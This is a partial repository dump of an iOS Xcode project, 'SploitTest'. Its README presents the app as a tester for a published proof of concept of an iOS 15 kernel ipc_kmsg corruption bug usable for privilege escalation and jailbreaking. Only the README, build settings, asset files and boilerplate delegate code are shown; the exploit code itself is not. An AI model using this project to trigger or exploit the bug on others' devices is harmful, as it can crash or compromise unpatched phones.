├── README.md
├── SploitTest.xcodeproj
    ├── project.pbxproj
    ├── project.xcworkspace
    │   ├── contents.xcworkspacedata
    │   ├── xcshareddata
    │   │   └── IDEWorkspaceChecks.plist
    │   └── xcuserdata
    │   │   └── geosn0w.xcuserdatad
    │   │       └── UserInterfaceState.xcuserstate
    └── xcuserdata
    │   └── geosn0w.xcuserdatad
    │       └── xcschemes
    │           └── xcschememanagement.plist
└── SploitTest
    ├── AppDelegate.h
    ├── AppDelegate.m
    ├── Assets.xcassets
        ├── AccentColor.colorset
        │   └── Contents.json
        ├── AppIcon.appiconset
        │   └── Contents.json
        └── Contents.json
    ├── Base.lproj
        ├── LaunchScreen.storyboard
        └── Main.storyboard
    ├── Info.plist
    ├── SceneDelegate.h
    ├── SceneDelegate.m
    ├── ViewController.h
    ├── ViewController.m
    └── main.m


/README.md:
--------------------------------------------------------------------------------
 1 | # SploitTest
 2 | A tester tool for the bug PoC released by Synacktiv for 15.0 - 15.4 beta 3
 3 | 
 4 | iOS 15.4 patched a kernel vulnerability introduced in iOS 15.0 beta that causes corruption of ipc_kmsgs which leads to powerful primitives that can be used for local privilege escalation from WebContent and app Sandbox.
 5 | 
 6 | Synacktiv have posted a tweetable PoC here: https://twitter.com/Synacktiv/status/1504142757157384198 and I've put it together in a small tester application.
 7 | 
 8 | With this app you can test if your device is vulnerable to this bug. If it is, it can be used for jailbreaking on your device!
 9 | 
10 | ## How to use:
11 | 
12 | Sideload the application and run it. Press the Run PoC button. If the device reboots, it's vulnerable. If nothing happens, it's not.
13 | 
14 | ## Credits 
15 | 
16 | * App developed by GeoSn0w (@FCE365): https://twitter.com/FCE365
17 | * YouTube Channel (iDevice Central): https://www.youtube.com/fce365official
18 | * Website: https://idevicecentral.com
19 | * PoC by @Synacktiv: https://twitter.com/Synacktiv/status/1504142757157384198
20 | 
21 | ### My Websites
22 | * <a href="https://idevicecentral.com">Latest iOS 16 Jailbreak News</a>
23 | * <a href="https://gametutorialpro.com">Latest Gaming News & Guides</a>
24 | * <a href="https://jailbreak.fce365.info">iOS Jailbreak Forum</a>
25 | * <a href="https://gsmbypass.com">Latest FRP Bypass Tools & Guides</a>
26 | 


--------------------------------------------------------------------------------
/SploitTest.xcodeproj/project.pbxproj:
--------------------------------------------------------------------------------
  1 | // !$*UTF8*$!
  2 | {
  3 | 	archiveVersion = 1;
  4 | 	classes = {
  5 | 	};
  6 | 	objectVersion = 55;
  7 | 	objects = {
  8 | 
  9 | /* Begin PBXBuildFile section */
 10 | 		D6F3434927E4D29500E7E431 /* AppDelegate.m in Sources */ = {isa = PBXBuildFile; fileRef = D6F3434827E4D29500E7E431 /* AppDelegate.m */; };
 11 | 		D6F3434C27E4D29500E7E431 /* SceneDelegate.m in Sources */ = {isa = PBXBuildFile; fileRef = D6F3434B27E4D29500E7E431 /* SceneDelegate.m */; };
 12 | 		D6F3434F27E4D29500E7E431 /* ViewController.m in Sources */ = {isa = PBXBuildFile; fileRef = D6F3434E27E4D29500E7E431 /* ViewController.m */; };
 13 | 		D6F3435227E4D29500E7E431 /* Main.storyboard in Resources */ = {isa = PBXBuildFile; fileRef = D6F3435027E4D29500E7E431 /* Main.storyboard */; };
 14 | 		D6F3435427E4D29600E7E431 /* Assets.xcassets in Resources */ = {isa = PBXBuildFile; fileRef = D6F3435327E4D29600E7E431 /* Assets.xcassets */; };
 15 | 		D6F3435727E4D29600E7E431 /* LaunchScreen.storyboard in Resources */ = {isa = PBXBuildFile; fileRef = D6F3435527E4D29600E7E431 /* LaunchScreen.storyboard */; };
 16 | 		D6F3435A27E4D29600E7E431 /* main.m in Sources */ = {isa = PBXBuildFile; fileRef = D6F3435927E4D29600E7E431 /* main.m */; };
 17 | /* End PBXBuildFile section */
 18 | 
 19 | /* Begin PBXFileReference section */
 20 | 		D6F3434427E4D29500E7E431 /* SploitTest.app */ = {isa = PBXFileReference; explicitFileType = wrapper.application; includeInIndex = 0; path = SploitTest.app; sourceTree = BUILT_PRODUCTS_DIR; };
 21 | 		D6F3434727E4D29500E7E431 /* AppDelegate.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = AppDelegate.h; sourceTree = "<group>"; };
 22 | 		D6F3434827E4D29500E7E431 /* AppDelegate.m */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.objc; path = AppDelegate.m; sourceTree = "<group>"; };
 23 | 		D6F3434A27E4D29500E7E431 /* SceneDelegate.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = SceneDelegate.h; sourceTree = "<group>"; };
 24 | 		D6F3434B27E4D29500E7E431 /* SceneDelegate.m */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.objc; path = SceneDelegate.m; sourceTree = "<group>"; };
 25 | 		D6F3434D27E4D29500E7E431 /* ViewController.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = ViewController.h; sourceTree = "<group>"; };
 26 | 		D6F3434E27E4D29500E7E431 /* ViewController.m */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.objc; path = ViewController.m; sourceTree = "<group>"; };
 27 | 		D6F3435127E4D29500E7E431 /* Base */ = {isa = PBXFileReference; lastKnownFileType = file.storyboard; name = Base; path = Base.lproj/Main.storyboard; sourceTree = "<group>"; };
 28 | 		D6F3435327E4D29600E7E431 /* Assets.xcassets */ = {isa = PBXFileReference; lastKnownFileType = folder.assetcatalog; path = Assets.xcassets; sourceTree = "<group>"; };
 29 | 		D6F3435627E4D29600E7E431 /* Base */ = {isa = PBXFileReference; lastKnownFileType = file.storyboard; name = Base; path = Base.lproj/LaunchScreen.storyboard; sourceTree = "<group>"; };
 30 | 		D6F3435827E4D29600E7E431 /* Info.plist */ = {isa = PBXFileReference; lastKnownFileType = text.plist.xml; path = Info.plist; sourceTree = "<group>"; };
 31 | 		D6F3435927E4D29600E7E431 /* main.m */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.objc; path = main.m; sourceTree = "<group>"; };
 32 | /* End PBXFileReference section */
 33 | 
 34 | /* Begin PBXFrameworksBuildPhase section */
 35 | 		D6F3434127E4D29500E7E431 /* Frameworks */ = {
 36 | 			isa = PBXFrameworksBuildPhase;
 37 | 			buildActionMask = 2147483647;
 38 | 			files = (
 39 | 			);
 40 | 			runOnlyForDeploymentPostprocessing = 0;
 41 | 		};
 42 | /* End PBXFrameworksBuildPhase section */
 43 | 
 44 | /* Begin PBXGroup section */
 45 | 		D6F3433B27E4D29500E7E431 = {
 46 | 			isa = PBXGroup;
 47 | 			children = (
 48 | 				D6F3434627E4D29500E7E431 /* SploitTest */,
 49 | 				D6F3434527E4D29500E7E431 /* Products */,
 50 | 			);
 51 | 			sourceTree = "<group>";
 52 | 		};
 53 | 		D6F3434527E4D29500E7E431 /* Products */ = {
 54 | 			isa = PBXGroup;
 55 | 			children = (
 56 | 				D6F3434427E4D29500E7E431 /* SploitTest.app */,
 57 | 			);
 58 | 			name = Products;
 59 | 			sourceTree = "<group>";
 60 | 		};
 61 | 		D6F3434627E4D29500E7E431 /* SploitTest */ = {
 62 | 			isa = PBXGroup;
 63 | 			children = (
 64 | 				D6F3434727E4D29500E7E431 /* AppDelegate.h */,
 65 | 				D6F3434827E4D29500E7E431 /* AppDelegate.m */,
 66 | 				D6F3434A27E4D29500E7E431 /* SceneDelegate.h */,
 67 | 				D6F3434B27E4D29500E7E431 /* SceneDelegate.m */,
 68 | 				D6F3434D27E4D29500E7E431 /* ViewController.h */,
 69 | 				D6F3434E27E4D29500E7E431 /* ViewController.m */,
 70 | 				D6F3435027E4D29500E7E431 /* Main.storyboard */,
 71 | 				D6F3435327E4D29600E7E431 /* Assets.xcassets */,
 72 | 				D6F3435527E4D29600E7E431 /* LaunchScreen.storyboard */,
 73 | 				D6F3435827E4D29600E7E431 /* Info.plist */,
 74 | 				D6F3435927E4D29600E7E431 /* main.m */,
 75 | 			);
 76 | 			path = SploitTest;
 77 | 			sourceTree = "<group>";
 78 | 		};
 79 | /* End PBXGroup section */
 80 | 
 81 | /* Begin PBXNativeTarget section */
 82 | 		D6F3434327E4D29500E7E431 /* SploitTest */ = {
 83 | 			isa = PBXNativeTarget;
 84 | 			buildConfigurationList = D6F3435D27E4D29600E7E431 /* Build configuration list for PBXNativeTarget "SploitTest" */;
 85 | 			buildPhases = (
 86 | 				D6F3434027E4D29500E7E431 /* Sources */,
 87 | 				D6F3434127E4D29500E7E431 /* Frameworks */,
 88 | 				D6F3434227E4D29500E7E431 /* Resources */,
 89 | 			);
 90 | 			buildRules = (
 91 | 			);
 92 | 			dependencies = (
 93 | 			);
 94 | 			name = SploitTest;
 95 | 			productName = SploitTest;
 96 | 			productReference = D6F3434427E4D29500E7E431 /* SploitTest.app */;
 97 | 			productType = "com.apple.product-type.application";
 98 | 		};
 99 | /* End PBXNativeTarget section */
100 | 
101 | /* Begin PBXProject section */
102 | 		D6F3433C27E4D29500E7E431 /* Project object */ = {
103 | 			isa = PBXProject;
104 | 			attributes = {
105 | 				BuildIndependentTargetsInParallel = 1;
106 | 				LastUpgradeCheck = 1320;
107 | 				TargetAttributes = {
108 | 					D6F3434327E4D29500E7E431 = {
109 | 						CreatedOnToolsVersion = 13.2.1;
110 | 					};
111 | 				};
112 | 			};
113 | 			buildConfigurationList = D6F3433F27E4D29500E7E431 /* Build configuration list for PBXProject "SploitTest" */;
114 | 			compatibilityVersion = "Xcode 13.0";
115 | 			developmentRegion = en;
116 | 			hasScannedForEncodings = 0;
117 | 			knownRegions = (
118 | 				en,
119 | 				Base,
120 | 			);
121 | 			mainGroup = D6F3433B27E4D29500E7E431;
122 | 			productRefGroup = D6F3434527E4D29500E7E431 /* Products */;
123 | 			projectDirPath = "";
124 | 			projectRoot = "";
125 | 			targets = (
126 | 				D6F3434327E4D29500E7E431 /* SploitTest */,
127 | 			);
128 | 		};
129 | /* End PBXProject section */
130 | 
131 | /* Begin PBXResourcesBuildPhase section */
132 | 		D6F3434227E4D29500E7E431 /* Resources */ = {
133 | 			isa = PBXResourcesBuildPhase;
134 | 			buildActionMask = 2147483647;
135 | 			files = (
136 | 				D6F3435727E4D29600E7E431 /* LaunchScreen.storyboard in Resources */,
137 | 				D6F3435427E4D29600E7E431 /* Assets.xcassets in Resources */,
138 | 				D6F3435227E4D29500E7E431 /* Main.storyboard in Resources */,
139 | 			);
140 | 			runOnlyForDeploymentPostprocessing = 0;
141 | 		};
142 | /* End PBXResourcesBuildPhase section */
143 | 
144 | /* Begin PBXSourcesBuildPhase section */
145 | 		D6F3434027E4D29500E7E431 /* Sources */ = {
146 | 			isa = PBXSourcesBuildPhase;
147 | 			buildActionMask = 2147483647;
148 | 			files = (
149 | 				D6F3434F27E4D29500E7E431 /* ViewController.m in Sources */,
150 | 				D6F3434927E4D29500E7E431 /* AppDelegate.m in Sources */,
151 | 				D6F3435A27E4D29600E7E431 /* main.m in Sources */,
152 | 				D6F3434C27E4D29500E7E431 /* SceneDelegate.m in Sources */,
153 | 			);
154 | 			runOnlyForDeploymentPostprocessing = 0;
155 | 		};
156 | /* End PBXSourcesBuildPhase section */
157 | 
158 | /* Begin PBXVariantGroup section */
159 | 		D6F3435027E4D29500E7E431 /* Main.storyboard */ = {
160 | 			isa = PBXVariantGroup;
161 | 			children = (
162 | 				D6F3435127E4D29500E7E431 /* Base */,
163 | 			);
164 | 			name = Main.storyboard;
165 | 			sourceTree = "<group>";
166 | 		};
167 | 		D6F3435527E4D29600E7E431 /* LaunchScreen.storyboard */ = {
168 | 			isa = PBXVariantGroup;
169 | 			children = (
170 | 				D6F3435627E4D29600E7E431 /* Base */,
171 | 			);
172 | 			name = LaunchScreen.storyboard;
173 | 			sourceTree = "<group>";
174 | 		};
175 | /* End PBXVariantGroup section */
176 | 
177 | /* Begin XCBuildConfiguration section */
178 | 		D6F3435B27E4D29600E7E431 /* Debug */ = {
179 | 			isa = XCBuildConfiguration;
180 | 			buildSettings = {
181 | 				ALWAYS_SEARCH_USER_PATHS = NO;
182 | 				CLANG_ANALYZER_NONNULL = YES;
183 | 				CLANG_ANALYZER_NUMBER_OBJECT_CONVERSION = YES_AGGRESSIVE;
184 | 				CLANG_CXX_LANGUAGE_STANDARD = "gnu++17";
185 | 				CLANG_CXX_LIBRARY = "libc++";
186 | 				CLANG_ENABLE_MODULES = YES;
187 | 				CLANG_ENABLE_OBJC_ARC = YES;
188 | 				CLANG_ENABLE_OBJC_WEAK = YES;
189 | 				CLANG_WARN_BLOCK_CAPTURE_AUTORELEASING = YES;
190 | 				CLANG_WARN_BOOL_CONVERSION = YES;
191 | 				CLANG_WARN_COMMA = YES;
192 | 				CLANG_WARN_CONSTANT_CONVERSION = YES;
193 | 				CLANG_WARN_DEPRECATED_OBJC_IMPLEMENTATIONS = YES;
194 | 				CLANG_WARN_DIRECT_OBJC_ISA_USAGE = YES_ERROR;
195 | 				CLANG_WARN_DOCUMENTATION_COMMENTS = YES;
196 | 				CLANG_WARN_EMPTY_BODY = YES;
197 | 				CLANG_WARN_ENUM_CONVERSION = YES;
198 | 				CLANG_WARN_INFINITE_RECURSION = YES;
199 | 				CLANG_WARN_INT_CONVERSION = YES;
200 | 				CLANG_WARN_NON_LITERAL_NULL_CONVERSION = YES;
201 | 				CLANG_WARN_OBJC_IMPLICIT_RETAIN_SELF = YES;
202 | 				CLANG_WARN_OBJC_LITERAL_CONVERSION = YES;
203 | 				CLANG_WARN_OBJC_ROOT_CLASS = YES_ERROR;
204 | 				CLANG_WARN_QUOTED_INCLUDE_IN_FRAMEWORK_HEADER = YES;
205 | 				CLANG_WARN_RANGE_LOOP_ANALYSIS = YES;
206 | 				CLANG_WARN_STRICT_PROTOTYPES = YES;
207 | 				CLANG_WARN_SUSPICIOUS_MOVE = YES;
208 | 				CLANG_WARN_UNGUARDED_AVAILABILITY = YES_AGGRESSIVE;
209 | 				CLANG_WARN_UNREACHABLE_CODE = YES;
210 | 				CLANG_WARN__DUPLICATE_METHOD_MATCH = YES;
211 | 				COPY_PHASE_STRIP = NO;
212 | 				DEBUG_INFORMATION_FORMAT = dwarf;
213 | 				ENABLE_STRICT_OBJC_MSGSEND = YES;
214 | 				ENABLE_TESTABILITY = YES;
215 | 				GCC_C_LANGUAGE_STANDARD = gnu11;
216 | 				GCC_DYNAMIC_NO_PIC = NO;
217 | 				GCC_NO_COMMON_BLOCKS = YES;
218 | 				GCC_OPTIMIZATION_LEVEL = 0;
219 | 				GCC_PREPROCESSOR_DEFINITIONS = (
220 | 					"DEBUG=1",
221 | 					"$(inherited)",
222 | 				);
223 | 				GCC_WARN_64_TO_32_BIT_CONVERSION = YES;
224 | 				GCC_WARN_ABOUT_RETURN_TYPE = YES_ERROR;
225 | 				GCC_WARN_UNDECLARED_SELECTOR = YES;
226 | 				GCC_WARN_UNINITIALIZED_AUTOS = YES_AGGRESSIVE;
227 | 				GCC_WARN_UNUSED_FUNCTION = YES;
228 | 				GCC_WARN_UNUSED_VARIABLE = YES;
229 | 				IPHONEOS_DEPLOYMENT_TARGET = 15.2;
230 | 				MTL_ENABLE_DEBUG_INFO = INCLUDE_SOURCE;
231 | 				MTL_FAST_MATH = YES;
232 | 				ONLY_ACTIVE_ARCH = YES;
233 | 				SDKROOT = iphoneos;
234 | 			};
235 | 			name = Debug;
236 | 		};
237 | 		D6F3435C27E4D29600E7E431 /* Release */ = {
238 | 			isa = XCBuildConfiguration;
239 | 			buildSettings = {
240 | 				ALWAYS_SEARCH_USER_PATHS = NO;
241 | 				CLANG_ANALYZER_NONNULL = YES;
242 | 				CLANG_ANALYZER_NUMBER_OBJECT_CONVERSION = YES_AGGRESSIVE;
243 | 				CLANG_CXX_LANGUAGE_STANDARD = "gnu++17";
244 | 				CLANG_CXX_LIBRARY = "libc++";
245 | 				CLANG_ENABLE_MODULES = YES;
246 | 				CLANG_ENABLE_OBJC_ARC = YES;
247 | 				CLANG_ENABLE_OBJC_WEAK = YES;
248 | 				CLANG_WARN_BLOCK_CAPTURE_AUTORELEASING = YES;
249 | 				CLANG_WARN_BOOL_CONVERSION = YES;
250 | 				CLANG_WARN_COMMA = YES;
251 | 				CLANG_WARN_CONSTANT_CONVERSION = YES;
252 | 				CLANG_WARN_DEPRECATED_OBJC_IMPLEMENTATIONS = YES;
253 | 				CLANG_WARN_DIRECT_OBJC_ISA_USAGE = YES_ERROR;
254 | 				CLANG_WARN_DOCUMENTATION_COMMENTS = YES;
255 | 				CLANG_WARN_EMPTY_BODY = YES;
256 | 				CLANG_WARN_ENUM_CONVERSION = YES;
257 | 				CLANG_WARN_INFINITE_RECURSION = YES;
258 | 				CLANG_WARN_INT_CONVERSION = YES;
259 | 				CLANG_WARN_NON_LITERAL_NULL_CONVERSION = YES;
260 | 				CLANG_WARN_OBJC_IMPLICIT_RETAIN_SELF = YES;
261 | 				CLANG_WARN_OBJC_LITERAL_CONVERSION = YES;
262 | 				CLANG_WARN_OBJC_ROOT_CLASS = YES_ERROR;
263 | 				CLANG_WARN_QUOTED_INCLUDE_IN_FRAMEWORK_HEADER = YES;
264 | 				CLANG_WARN_RANGE_LOOP_ANALYSIS = YES;
265 | 				CLANG_WARN_STRICT_PROTOTYPES = YES;
266 | 				CLANG_WARN_SUSPICIOUS_MOVE = YES;
267 | 				CLANG_WARN_UNGUARDED_AVAILABILITY = YES_AGGRESSIVE;
268 | 				CLANG_WARN_UNREACHABLE_CODE = YES;
269 | 				CLANG_WARN__DUPLICATE_METHOD_MATCH = YES;
270 | 				COPY_PHASE_STRIP = NO;
271 | 				DEBUG_INFORMATION_FORMAT = "dwarf-with-dsym";
272 | 				ENABLE_NS_ASSERTIONS = NO;
273 | 				ENABLE_STRICT_OBJC_MSGSEND = YES;
274 | 				GCC_C_LANGUAGE_STANDARD = gnu11;
275 | 				GCC_NO_COMMON_BLOCKS = YES;
276 | 				GCC_WARN_64_TO_32_BIT_CONVERSION = YES;
277 | 				GCC_WARN_ABOUT_RETURN_TYPE = YES_ERROR;
278 | 				GCC_WARN_UNDECLARED_SELECTOR = YES;
279 | 				GCC_WARN_UNINITIALIZED_AUTOS = YES_AGGRESSIVE;
280 | 				GCC_WARN_UNUSED_FUNCTION = YES;
281 | 				GCC_WARN_UNUSED_VARIABLE = YES;
282 | 				IPHONEOS_DEPLOYMENT_TARGET = 15.2;
283 | 				MTL_ENABLE_DEBUG_INFO = NO;
284 | 				MTL_FAST_MATH = YES;
285 | 				SDKROOT = iphoneos;
286 | 				VALIDATE_PRODUCT = YES;
287 | 			};
288 | 			name = Release;
289 | 		};
290 | 		D6F3435E27E4D29600E7E431 /* Debug */ = {
291 | 			isa = XCBuildConfiguration;
292 | 			buildSettings = {
293 | 				ASSETCATALOG_COMPILER_APPICON_NAME = AppIcon;
294 | 				ASSETCATALOG_COMPILER_GLOBAL_ACCENT_COLOR_NAME = AccentColor;
295 | 				CODE_SIGN_STYLE = Automatic;
296 | 				CURRENT_PROJECT_VERSION = 1;
297 | 				DEVELOPMENT_TEAM = 3AZ78RL6YX;
298 | 				GENERATE_INFOPLIST_FILE = YES;
299 | 				INFOPLIST_FILE = SploitTest/Info.plist;
300 | 				INFOPLIST_KEY_UIApplicationSupportsIndirectInputEvents = YES;
301 | 				INFOPLIST_KEY_UILaunchStoryboardName = LaunchScreen;
302 | 				INFOPLIST_KEY_UIMainStoryboardFile = Main;
303 | 				INFOPLIST_KEY_UISupportedInterfaceOrientations_iPad = "UIInterfaceOrientationPortrait UIInterfaceOrientationPortraitUpsideDown UIInterfaceOrientationLandscapeLeft UIInterfaceOrientationLandscapeRight";
304 | 				INFOPLIST_KEY_UISupportedInterfaceOrientations_iPhone = "UIInterfaceOrientationPortrait UIInterfaceOrientationLandscapeLeft UIInterfaceOrientationLandscapeRight";
305 | 				IPHONEOS_DEPLOYMENT_TARGET = 13.6;
306 | 				LD_RUNPATH_SEARCH_PATHS = (
307 | 					"$(inherited)",
308 | 					"@executable_path/Frameworks",
309 | 				);
310 | 				MARKETING_VERSION = 1.0;
311 | 				PRODUCT_BUNDLE_IDENTIFIER = com.geosn0w.SploitTest;
312 | 				PRODUCT_NAME = "$(TARGET_NAME)";
313 | 				SWIFT_EMIT_LOC_STRINGS = YES;
314 | 				TARGETED_DEVICE_FAMILY = "1,2";
315 | 			};
316 | 			name = Debug;
317 | 		};
318 | 		D6F3435F27E4D29600E7E431 /* Release */ = {
319 | 			isa = XCBuildConfiguration;
320 | 			buildSettings = {
321 | 				ASSETCATALOG_COMPILER_APPICON_NAME = AppIcon;
322 | 				ASSETCATALOG_COMPILER_GLOBAL_ACCENT_COLOR_NAME = AccentColor;
323 | 				CODE_SIGN_STYLE = Automatic;
324 | 				CURRENT_PROJECT_VERSION = 1;
325 | 				DEVELOPMENT_TEAM = 3AZ78RL6YX;
326 | 				GENERATE_INFOPLIST_FILE = YES;
327 | 				INFOPLIST_FILE = SploitTest/Info.plist;
328 | 				INFOPLIST_KEY_UIApplicationSupportsIndirectInputEvents = YES;
329 | 				INFOPLIST_KEY_UILaunchStoryboardName = LaunchScreen;
330 | 				INFOPLIST_KEY_UIMainStoryboardFile = Main;
331 | 				INFOPLIST_KEY_UISupportedInterfaceOrientations_iPad = "UIInterfaceOrientationPortrait UIInterfaceOrientationPortraitUpsideDown UIInterfaceOrientationLandscapeLeft UIInterfaceOrientationLandscapeRight";
332 | 				INFOPLIST_KEY_UISupportedInterfaceOrientations_iPhone = "UIInterfaceOrientationPortrait UIInterfaceOrientationLandscapeLeft UIInterfaceOrientationLandscapeRight";
333 | 				IPHONEOS_DEPLOYMENT_TARGET = 13.6;
334 | 				LD_RUNPATH_SEARCH_PATHS = (
335 | 					"$(inherited)",
336 | 					"@executable_path/Frameworks",
337 | 				);
338 | 				MARKETING_VERSION = 1.0;
339 | 				PRODUCT_BUNDLE_IDENTIFIER = com.geosn0w.SploitTest;
340 | 				PRODUCT_NAME = "$(TARGET_NAME)";
341 | 				SWIFT_EMIT_LOC_STRINGS = YES;
342 | 				TARGETED_DEVICE_FAMILY = "1,2";
343 | 			};
344 | 			name = Release;
345 | 		};
346 | /* End XCBuildConfiguration section */
347 | 
348 | /* Begin XCConfigurationList section */
349 | 		D6F3433F27E4D29500E7E431 /* Build configuration list for PBXProject "SploitTest" */ = {
350 | 			isa = XCConfigurationList;
351 | 			buildConfigurations = (
352 | 				D6F3435B27E4D29600E7E431 /* Debug */,
353 | 				D6F3435C27E4D29600E7E431 /* Release */,
354 | 			);
355 | 			defaultConfigurationIsVisible = 0;
356 | 			defaultConfigurationName = Release;
357 | 		};
358 | 		D6F3435D27E4D29600E7E431 /* Build configuration list for PBXNativeTarget "SploitTest" */ = {
359 | 			isa = XCConfigurationList;
360 | 			buildConfigurations = (
361 | 				D6F3435E27E4D29600E7E431 /* Debug */,
362 | 				D6F3435F27E4D29600E7E431 /* Release */,
363 | 			);
364 | 			defaultConfigurationIsVisible = 0;
365 | 			defaultConfigurationName = Release;
366 | 		};
367 | /* End XCConfigurationList section */
368 | 	};
369 | 	rootObject = D6F3433C27E4D29500E7E431 /* Project object */;
370 | }
371 | 


--------------------------------------------------------------------------------
/SploitTest.xcodeproj/project.xcworkspace/contents.xcworkspacedata:
--------------------------------------------------------------------------------
1 | <?xml version="1.0" encoding="UTF-8"?>
2 | <Workspace
3 |    version = "1.0">
4 |    <FileRef
5 |       location = "self:">
6 |    </FileRef>
7 | </Workspace>
8 | 


--------------------------------------------------------------------------------
/SploitTest.xcodeproj/project.xcworkspace/xcshareddata/IDEWorkspaceChecks.plist:
--------------------------------------------------------------------------------
1 | <?xml version="1.0" encoding="UTF-8"?>
2 | <!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
3 | <plist version="1.0">
4 | <dict>
5 | 	<key>IDEDidComputeMac32BitWarning</key>
6 | 	<true/>
7 | </dict>
8 | </plist>
9 | 


--------------------------------------------------------------------------------
/SploitTest.xcodeproj/project.xcworkspace/xcuserdata/geosn0w.xcuserdatad/UserInterfaceState.xcuserstate:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/GeoSn0w/SploitTest/827cc7ac4e6a95ca280fa10988b74ba55a508606/SploitTest.xcodeproj/project.xcworkspace/xcuserdata/geosn0w.xcuserdatad/UserInterfaceState.xcuserstate


--------------------------------------------------------------------------------
/SploitTest.xcodeproj/xcuserdata/geosn0w.xcuserdatad/xcschemes/xcschememanagement.plist:
--------------------------------------------------------------------------------
 1 | <?xml version="1.0" encoding="UTF-8"?>
 2 | <!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
 3 | <plist version="1.0">
 4 | <dict>
 5 | 	<key>SchemeUserState</key>
 6 | 	<dict>
 7 | 		<key>SploitTest.xcscheme_^#shared#^_</key>
 8 | 		<dict>
 9 | 			<key>orderHint</key>
10 | 			<integer>0</integer>
11 | 		</dict>
12 | 	</dict>
13 | </dict>
14 | </plist>
15 | 


--------------------------------------------------------------------------------
/SploitTest/AppDelegate.h:
--------------------------------------------------------------------------------
 1 | //
 2 | //  AppDelegate.h
 3 | //  SploitTest
 4 | //
 5 | //  Created by GeoSn0w on 3/18/22.
 6 | //
 7 | 
 8 | #import <UIKit/UIKit.h>
 9 | 
10 | @interface AppDelegate : UIResponder <UIApplicationDelegate>
11 | 
12 | 
13 | @end
14 | 
15 | 


--------------------------------------------------------------------------------
/SploitTest/AppDelegate.m:
--------------------------------------------------------------------------------
 1 | //
 2 | //  AppDelegate.m
 3 | //  SploitTest
 4 | //
 5 | //  Created by GeoSn0w on 3/18/22.
 6 | //
 7 | 
 8 | #import "AppDelegate.h"
 9 | 
10 | @interface AppDelegate ()
11 | 
12 | @end
13 | 
14 | @implementation AppDelegate
15 | 
16 | 
17 | - (BOOL)application:(UIApplication *)application didFinishLaunchingWithOptions:(NSDictionary *)launchOptions {
18 |     // Override point for customization after application launch.
19 |     return YES;
20 | }
21 | 
22 | 
23 | #pragma mark - UISceneSession lifecycle
24 | 
25 | 
26 | - (UISceneConfiguration *)application:(UIApplication *)application configurationForConnectingSceneSession:(UISceneSession *)connectingSceneSession options:(UISceneConnectionOptions *)options {
27 |     // Called when a new scene session is being created.
28 |     // Use this method to select a configuration to create the new scene with.
29 |     return [[UISceneConfiguration alloc] initWithName:@"Default Configuration" sessionRole:connectingSceneSession.role];
30 | }
31 | 
32 | 
33 | - (void)application:(UIApplication *)application didDiscardSceneSessions:(NSSet<UISceneSession *> *)sceneSessions {
34 |     // Called when the user discards a scene session.
35 |     // If any sessions were discarded while the application was not running, this will be called shortly after application:didFinishLaunchingWithOptions.
36 |     // Use this method to release any resources that were specific to the discarded scenes, as they will not return.
37 | }
38 | 
39 | 
40 | @end
41 | 


--------------------------------------------------------------------------------
/SploitTest/Assets.xcassets/AccentColor.colorset/Contents.json:
--------------------------------------------------------------------------------
 1 | {
 2 |   "colors" : [
 3 |     {
 4 |       "idiom" : "universal"
 5 |     }
 6 |   ],
 7 |   "info" : {
 8 |     "author" : "xcode",
 9 |     "version" : 1
10 |   }
11 | }
12 | 


--------------------------------------------------------------------------------
/SploitTest/Assets.xcassets/AppIcon.appiconset/Contents.json:
--------------------------------------------------------------------------------
 1 | {
 2 |   "images" : [
 3 |     {
 4 |       "idiom" : "iphone",
 5 |       "scale" : "2x",
 6 |       "size" : "20x20"
 7 |     },
 8 |     {
 9 |       "idiom" : "iphone",
10 |       "scale" : "3x",
11 |       "size" : "20x20"
12 |     },
13 |     {
14 |       "idiom" : "iphone",
15 |       "scale" : "2x",
16 |       "size" : "29x29"
17 |     },
18 |     {
19 |       "idiom" : "iphone",
20 |       "scale" : "3x",
21 |       "size" : "29x29"
22 |     },
23 |     {
24 |       "idiom" : "iphone",
25 |       "scale" : "2x",
26 |       "size" : "40x40"
27 |     },
28 |     {
29 |       "idiom" : "iphone",
30 |       "scale" : "3x",
31 |       "size" : "40x40"
32 |     },
33 |     {
34 |       "idiom" : "iphone",
35 |       "scale" : "2x",
36 |       "size" : "60x60"
37 |     },
38 |     {
39 |       "idiom" : "iphone",
40 |       "scale" : "3x",
41 |       "size" : "60x60"
42 |     },
43 |     {
44 |       "idiom" : "ipad",
45 |       "scale" : "1x",
46 |       "size" : "20x20"
47 |     },
48 |     {
49 |       "idiom" : "ipad",
50 |       "scale" : "2x",
51 |       "size" : "20x20"
52 |     },
53 |     {
54 |       "idiom" : "ipad",
55 |       "scale" : "1x",
56 |       "size" : "29x29"
57 |     },
58 |     {
59 |       "idiom" : "ipad",
60 |       "scale" : "2x",
61 |       "size" : "29x29"
62 |     },
63 |     {
64 |       "idiom" : "ipad",
65 |       "scale" : "1x",
66 |       "size" : "40x40"
67 |     },
68 |     {
69 |       "idiom" : "ipad",
70 |       "scale" : "2x",
71 |       "size" : "40x40"
72 |     },
73 |     {
74 |       "idiom" : "ipad",
75 |       "scale" : "1x",
76 |       "size" : "76x76"
77 |     },
78 |     {
79 |       "idiom" : "ipad",
80 |       "scale" : "2x",
81 |       "size" : "76x76"
82 |     },
83 |     {
84 |       "idiom" : "ipad",
85 |       "scale" : "2x",
86 |       "size" : "83.5x83.5"
87 |     },
88 |     {
89 |       "idiom" : "ios-marketing",
90 |       "scale" : "1x",
91 |       "size" : "1024x1024"
92 |     }
93 |   ],
94 |   "info" : {
95 |     "author" : "xcode",
96 |     "version" : 1
97 |   }
98 | }
99 | 


--------------------------------------------------------------------------------
/SploitTest/Assets.xcassets/Contents.json:
--------------------------------------------------------------------------------
1 | {
2 |   "info" : {
3 |     "author" : "xcode",
4 |     "version" : 1
5 |   }
6 | }
7 | 


--------------------------------------------------------------------------------
/SploitTest/Base.lproj/LaunchScreen.storyboard:
